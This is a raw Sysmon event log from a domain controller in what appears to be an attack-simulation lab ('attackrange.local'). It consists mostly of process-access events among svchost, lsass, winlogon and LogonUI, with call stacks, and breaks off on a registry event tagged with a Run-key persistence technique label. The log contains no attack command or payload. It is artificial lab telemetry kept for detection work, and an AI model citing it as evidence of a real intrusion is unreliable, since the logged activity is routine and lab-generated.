09:21:43.498{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d7e|C:\Windows\system32\lsasrv.dll+195f6|C:\Windows\system32\lsasrv.dll+1ab9f|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055172Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.482{5EBD8912-8CC0-6151-1600-00000000FD01}12961784C:\Windows\system32\svchost.exe{5EBD8912-8D27-6151-8700-00000000FD01}3724C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055171Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.482{5EBD8912-8CC0-6151-1600-00000000FD01}12961336C:\Windows\system32\svchost.exe{5EBD8912-8D27-6151-8700-00000000FD01}3724C:\Windows\system32\LogonUI.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055170Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.467{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055169Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.467{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055168Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.451{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055167Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.451{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055166Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.451{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055165Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.451{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055164Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.451{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055163Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.451{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055162Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.451{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055161Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.451{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055160Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.451{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055159Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.451{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055158Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.451{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055157Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.451{5EBD8912-8D26-6151-8500-00000000FD01}27603956C:\Windows\system32\csrss.exe{5EBD8912-8D27-6151-8700-00000000FD01}3724C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055156Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.451{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055155Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.451{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055154Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.451{5EBD8912-8D26-6151-8600-00000000FD01}12883484C:\Windows\system32\winlogon.exe{5EBD8912-8D27-6151-8700-00000000FD01}3724C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\winlogon.exe+193b7|C:\Windows\system32\winlogon.exe+22617|C:\Windows\system32\winlogon.exe+2b287|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055153Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.455{5EBD8912-8D27-6151-8700-00000000FD01}3724C:\Windows\System32\LogonUI.exe10.0.14393.0 (rs1_release.160715-1616)Windows Logon User Interface HostMicrosoft® Windows® Operating SystemMicrosoft Corporationlogonui.exe"LogonUI.exe" /flags:0x2 /state0:0xa3a58855 /state1:0x41c64e6dC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e72SystemMD5=B38DFCF985D8AE5B1A17C264981E61C7,SHA256=AA62D29803D52EC06CD27ED3124E034048F09606EB7342181913C9817C7B44C5,IMPHASH=A6F3A84D171E55B51A7343E05C8DFAC3{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\System32\winlogon.exewinlogon.exe 10341000x80000000000000001055152Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.451{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055151Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.451{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055150Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.451{5EBD8912-8CC0-6151-1600-00000000FD01}12961784C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055149Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.436{5EBD8912-8CC0-6151-1600-00000000FD01}12961784C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+4689|c:\windows\system32\themeservice.dll+3fdd|c:\windows\system32\themeservice.dll+3c53|c:\windows\system32\themeservice.dll+2675|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055148Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.436{5EBD8912-8CC0-6151-1600-00000000FD01}12961336C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055147Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.420{5EBD8912-8CC0-6151-1600-00000000FD01}12961784C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x147aC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\themeservice.dll+3de3|c:\windows\system32\themeservice.dll+26c0|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055146Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.420{5EBD8912-8CC0-6151-1600-00000000FD01}12961336C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001055145Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localT1060,RunKeySetValue2021-09-27 